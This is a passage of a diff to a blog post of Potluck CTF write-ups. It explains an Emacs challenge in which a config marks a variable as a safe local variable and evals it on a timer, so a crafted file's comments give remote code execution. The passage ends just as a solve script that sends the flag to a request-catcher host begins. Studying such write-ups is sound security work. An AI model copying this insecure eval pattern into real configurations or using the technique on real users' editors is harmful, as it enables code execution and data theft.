poniponiponiponiponiponiponiponiponi/poniponiponiponiponiponiponiponiponi.github.io/_posts/2023-12-29-Potluck-CTF-Writeups.markdown

 (put 'cooking-motivation-generator 'safe-local-variable (lambda (_) t)) (run-with-timer 2 2 (lambda () (eval cooking-motivation-generator)))
 ```
-The idea is to that Emacs will look at commented lines at the beginning and end of a file.
+The idea is that Emacs will look at commented lines at the beginning and end of a file.
 Those comments can overwrite variables inside of Emacs.
 This can lead to a more customized user experience but can also lead to a potential security risk.
 I think you can see where this is going to?
 Luckily we can mark variables as unsafe or safe.
 For unsafe variables we are first asked if we want to execute them, safe variables are executed automatically.
 In the config file we are creating a variable, marking it as safe with `(put 'cooking-motivation-generator 'safe-local-variable (lambda (_) t))` and then it's `eval`ed.
 Therefore the solution is to achieve RCE and read the flag.
-You can read more about local variables in files and it's safety there: https://www.gnu.org/software/emacs/manual/html_node/emacs/File-Variables.html .
-This is my solve.py that will send the flag to a requestcatcher:
+You can read more about local variables in files and [it's safety there](https://www.gnu.org/software/emacs/manual/html_node/emacs/File-Variables.html).
+This is my solve.py that will send the flag to a requestcatcher link:
 ```python
 import base64
 from pwn import *